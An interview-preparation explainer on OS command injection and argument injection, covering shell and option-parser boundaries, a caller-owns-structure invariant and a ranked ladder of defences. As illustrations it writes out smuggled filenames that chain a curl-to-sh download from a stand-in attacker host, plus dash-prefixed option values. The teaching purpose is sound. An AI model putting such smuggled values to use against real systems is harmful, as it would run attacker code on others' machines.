skip to content

OS command injection is usually taught as "strip out semicolons and pipes." Give the definition of the defect that also explains how a program can be exploited when no shell is involved and no metacharacter is accepted, and state the invariant the calling code must hold.

level: middleimportance: must knowfreq 65%

answer

  1. untrusted data must never decide structure
  2. two interpreters: the shell, and the callee's option parser
  3. argument injection needs no metacharacter — just a leading dash
  4. caller owns program, flags, order; user owns one value slot
  5. structural separation > enumeration > escaping > validation > detection

basics

~20 s

The defect is untrusted data deciding structure at an interpreter boundary. There are two here: the shell that parses a string into a command list, and the invoked program's own option parser reading its arguments. Removing the shell closes only the first.

solid answer

~60 s

Command injection is the general injection defect — a caller builds a request for an interpreter by concatenation, so the interpreter cannot tell which characters came from the template and which from the user, and data is promoted to structure. What makes this sink distinctive is that there are **two** interpreters in the path. **Boundary one** is the shell: it splits a string on whitespace, honours quotes, and treats `;`, `&&`, `|`, newline, `$(...)` and redirection as syntax. **Boundary two** is the invoked program's own argument parser: even with a strict array-based launch and zero metacharacters, a value that begins with `-` becomes an *option*, and programs have options that write files, load config, or run helper commands. That is argument injection, and no metacharacter filter sees it. The invariant: **the caller owns 100% of the structure**. The program name, the flags, and the number and order of arguments come from code; untrusted data occupies only value positions, arrives as one inert element, after an explicit end-of-options marker, with paths disambiguated so they cannot be read as flags.

code

text · 11 lines
text
BOUNDARY 1 — shell lexes a string into a command list
  run_shell("convert " + name + " out.png")
  name = "a.png; curl evil|sh"      -> two commands
  closed by: exec(argv[]) with no shell

BOUNDARY 2 — the callee parses its own argv
  exec(["convert", name, "out.png"])      # no shell at all
  name = "--some-option-that-writes-a-file=/path"
  -> not an operand, an OPTION. no metacharacter involved.
  closed by: exec(["convert", "--", "./" + name, "out.png"])
             + a code-owned allow-list of flags

go deeper

for a junior

State that user input must never be pasted into a command string, and that the invoked program also treats anything starting with a dash as an option, so an argument list alone is not the whole story.

for a middle

Articulate the two boundaries and the caller-owns-structure invariant, and name the concrete controls: no shell, one value per argument, end-of-options marker, path prefixing.

for a senior

Add the inventory dimension — where shells hide in configuration and tooling, second-order flows, and blind confirmation via timing or outbound lookups — and place the controls on the ladder with reasons.

for a principal

Argue the invariant as an architectural rule that applies across every interpreter the system talks to, and describe how you make the safe launch path the only reachable one (a single wrapper, lint rules banning shell-string APIs, review gates) rather than relying on developers to remember.

## The class, stated generally Every injection bug has the same shape: a caller composes a request for an interpreter by gluing a fixed template to untrusted data, and the interpreter then parses the whole thing. The interpreter has no channel through which it could learn which bytes the developer intended as structure and which arrived from a user, so any byte the user supplies that happens to be syntax *is* syntax. The database case is the reference instance of this and is covered on its own; the invariant is identical here. What makes OS command execution worth its own treatment is that the path from your code to the effect contains **two independent interpreters**, and the well-known defence closes only one of them. ## Boundary one: string to command list A shell is a programming language interpreter whose job is to turn a line of text into processes. Given a string it performs, roughly: parameter and variable expansion, command substitution (`$(...)` and backticks), arithmetic expansion, word splitting on a configurable separator, pathname expansion (globbing), quote removal, redirection setup, and the splitting of the line into a pipeline or a list joined by `;`, `&&`, `||` or a newline. Every one of those is a mechanism for a byte in your string to change what runs. So when a program builds `"convert " + filename + " out.png"` and hands the result to a shell, a filename of `x.png; curl attacker/s | sh` is not a filename — it is two more commands. Note that no quoting error is required: word splitting alone means an unquoted value containing a space becomes two arguments, and glob characters become a directory query. ## Boundary two: arguments to semantics Now assume you did the recommended thing: no shell, an explicit array of arguments, and a validator that rejects every shell metacharacter. You are still exploitable, because the *callee* parses its own arguments. By universal convention, an argument beginning with `-` is an option, not an operand. So a user-supplied "filename" of `--output=/etc/something`, or `-o`, or a long option that names a config file, a plugin, a script to run, a URL to fetch, or a debug hook, changes what the program does. Command-line tools are full of options that write files, execute helpers, load code, or follow network references — because for their intended user, that is a feature. Argument injection is invisible to a metacharacter filter because there are no metacharacters: `-` is an ordinary printable character. This is why the mental model "dangerous characters" fails and the mental model "who owns the structure" succeeds. In boundary one the structure is the command list; in boundary two the structure is the option/operand split. ## The invariant > The caller owns all structure. Untrusted values may occupy only positions that the caller has already fixed as value positions, and must arrive at the callee as inert elements that the callee cannot re-read as structure. Operationally that means: the executable path is a constant from code, never assembled; the flags are constants from code; the count and order of arguments are decided by code; each untrusted value becomes exactly one argument; an explicit end-of-options marker (`--`) precedes the operands so nothing after it is parsed as a flag; and a user-supplied path is prefixed (`./name`) so a leading dash cannot survive. Where the *structure itself* must vary with user input — which program to run, which flags to include — the value selects from a finite, code-owned set rather than being interpolated. ## Where the shell hides People remove the obvious shell call and leave several others: - one-string "run this command line" APIs, which spawn a shell by definition - a runtime whose launch API silently uses a shell when handed a string rather than an array, or when the target is a script without a valid interpreter line - container entrypoints and commands written in shell form rather than exec form - scheduled-job entries, build-tool recipes, process-supervisor configuration, and CI step definitions, all of which are shell text with variables interpolated - a remote-access forced command, where the client's requested command is appended to a template - a tool that shells out on *your* behalf: your call was argv-clean, but the program you invoked builds a shell string from the argument you passed it And the input does not have to arrive in the same request as the execution. **Second-order** cases are common: a value is stored now — a filename, a hostname, a display name — and interpolated into a maintenance script, a report job or a backup command later, often in a process with far more privilege than the one that accepted it. ## The defence ladder for this sink Use one ordering and one vocabulary: 1. **Structural separation.** Launch the program with an explicit argument vector and no shell. This is a *guarantee* rather than a heuristic: the operating system's process-creation primitive receives an array, so there is no lexing step in which a byte could become syntax. 2. **Closed-world enumeration**, which takes the top rung whenever the structure itself must be dynamic. A finite map from a public token to a code-owned invocation is bounded and owned by your code; a pattern that merely constrains characters is open-world and still admits every dangerous option that happens to match it. 3. **Escaping / transformation.** Quoting a value for a specific shell. Weaker because it requires you to model a lexer you did not write and cannot pin. 4. **Validation.** Rejecting inputs that look wrong. Useful, but a heuristic about what an attacker might send. 5. **Detection.** Logging, alerting, egress monitoring. Tells you afterwards. Each rung down trades a guarantee for a heuristic. The neighbouring sinks — a database query language, a file path, an HTML document — instantiate the same ladder with different top rungs, which is the point: the ladder is the transferable knowledge, the metacharacter list is not. ## Blind exploitation Finally, do not equate "the output is not returned to the user" with "not exploitable." Where nothing is echoed, an attacker confirms execution with a timing delay or by making the target perform an outbound lookup or request that they can observe. Absence of visible output is absence of a convenience, not absence of impact.

  • If the value is validated to contain only letters, digits, dots and dashes, is argument injection still possible?
    Yes. A dash is in that set, so `-o` or `--config=x` passes the filter and is still parsed as an option by the callee. Character-class validation is an open-world control: it constrains the alphabet but not the meaning. The closed-world fix is to mark the end of options explicitly, prefix relative paths so they cannot begin with a dash, and take the flags themselves from a fixed set in code.
  • Give an example of command injection where the vulnerable code and the injection point are in different processes.
    A user registers a display name or uploads a file whose name is stored verbatim. Weeks later a nightly maintenance job, a backup script, or a log-rotation recipe interpolates that stored string into a shell command and runs it — often as a much more privileged user than the web process that accepted it. The web handler looked safe because it never executed anything; the sink lives elsewhere. This is why you trace data flow to sinks rather than auditing request handlers in isolation.
  • How does this relate to the same defect in a database query language?
    It is the same invariant — untrusted data must not decide structure at an interpreter boundary — with a different top rung. There the structural separation is a precompiled statement with bound values; here it is a process launch that takes an array so no lexer runs. The difference worth stating is the second boundary: a database engine does not re-parse a bound value, whereas an invoked program always re-parses its own arguments, so this sink needs an extra control that the database case does not.

Filtering metacharacters is like checking that a courier's parcel contains no scissors, while still letting the sender write the delivery address and the handling instructions on the outside. The dangerous part was never the contents; it was who got to fill in the fields that tell the system what to do.

saying these in an interview costs you the question

  • "We block ; | & ` $ and newline, so we're safe" — argument injection uses none of them.
  • Believing that removing the shell removes the whole bug class.
  • Auditing only the request handler and missing stored values that reach a shell in a later batch job.
  • Assuming a value with no spaces is safe, when word splitting, globbing and a leading dash are all still in play.
  • Concluding a sink is not exploitable because no command output is reflected back.

context